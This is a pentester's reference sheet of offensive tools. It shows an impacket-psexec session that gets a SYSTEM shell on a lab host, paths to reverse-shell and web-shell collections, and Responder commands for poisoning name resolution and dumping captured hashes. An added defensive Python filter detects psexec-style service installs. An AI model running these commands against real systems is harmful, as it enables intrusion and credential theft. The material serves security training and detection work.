Misc Pentesting Tools

tags: Security Tools

collection

Misc

impacket

Impacket is a collection of Python classes for working with network protocols.

impacket-psexec

Get a SYSTEM shell over SMB (uploads a binary to a writable admin share and runs it as a service):

python3 psexec.py Administrator@bastion.htb 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on bastion.htb.....
[*] Found writable share ADMIN$
[*] Uploading file hoQpxzMA.exe
[*] Opening SVCManager on bastion.htb.....
[*] Creating service qdbo on bastion.htb.....
[*] Starting service qdbo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
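Defender-side counterpart to the session above, added here and not part of the original notes: a small Python filter over constructed Windows System log records (Event ID 7045, "a service was installed") that flags the footprint visible in that run, a short random service name backed by a random-named .exe dropped into ADMIN$ (%SystemRoot%) and running as LocalSystem. The sample records and the naming heuristic are assumptions, not Impacket's documented behaviour.

```python
import re

# Constructed sample records modelled on Windows System log Event ID 7045
# ("A service was installed in the system"); 7036 is a status-change event
# included as a negative case. All values are made up for illustration.
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "bastion", "service_name": "qdbo",
     "image_path": "%SystemRoot%\\hoQpxzMA.exe", "account": "LocalSystem"},
    {"event_id": 7045, "host": "bastion", "service_name": "Spooler",
     "image_path": "%SystemRoot%\\System32\\spoolsv.exe", "account": "LocalSystem"},
    {"event_id": 7036, "host": "bastion", "service_name": "qdbo",
     "image_path": "", "account": ""},
]

# Heuristic (assumption, derived from the session output above): a 4-letter
# service name and an 8-letter .exe placed directly under %SystemRoot%
# (what the ADMIN$ share maps to). Legitimate services rarely look like this.
RANDOM_SERVICE = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY = re.compile(
    r"^(%SystemRoot%|[A-Za-z]:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def is_psexec_like(event: dict) -> bool:
    """True for a 7045 service-install record matching the psexec-style footprint."""
    if event.get("event_id") != 7045:
        return False
    return (bool(RANDOM_SERVICE.match(event.get("service_name", "")))
            and bool(RANDOM_BINARY.match(event.get("image_path", "")))
            and event.get("account", "").lower() == "localsystem")


def find_suspicious_installs(events: list) -> list:
    """Filter a list of event records down to psexec-like service installs."""
    return [e for e in events if is_psexec_like(e)]


if __name__ == "__main__":
    for e in find_suspicious_installs(SAMPLE_EVENTS):
        print(f"[{e['host']}] suspicious service {e['service_name']} -> {e['image_path']}")
```

Correlating the hit with an SMB write to ADMIN$ (Event ID 5145 on the share) from the same source shortly before the 7045 record tightens the alert.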

seclists

List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

/usr/share/seclists
Discovery  IOCs           Passwords         Payloads   Usernames
Fuzzing    Miscellaneous  Pattern-Matching  README.md  Web-Shells

Laudanum

Laudanum is a collection of injectable files (web shells and reverse shells for ASP, ASPX, CFM, JSP, PHP and WordPress).

/usr/share/laudanum
asp  aspx  cfm  helpers  jsp  php  README  wordpress
  • php - reverse shell: /usr/share/laudanum/php/php-reverse-shell.php

Microsoft

nishang

Offensive PowerShell for red team, penetration testing and offensive security (GitHub).

/usr/share/nishang/
ActiveDirectory  Bypass      Execution  MITM          powerpreter  Shells
Antak-WebShell   Client      Gather     nishang.psm1  Prasadhak    Utility
Backdoors        Escalation  Misc       Pivot         Scan

PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework

/usr/share/windows-resources/powersploit (note: the version packaged here is too old)
AntivirusBypass  Mayhem            PowerSploit.psm1  Recon
CodeExecution    Persistence       Privesc           ScriptModification
Exfiltration     PowerSploit.psd1  README.md         Tests

Others

Responder/MultiRelay

Responder (GitHub: lgandx/Responder) is an LLMNR, NBT-NS and mDNS poisoner. It answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).

responder -I tun0

Get the full captured hashes from Responder's SQLite database:

locate Responder.db
sqlite3 /usr/share/responder/Responder.db
sqlite> select * from responder;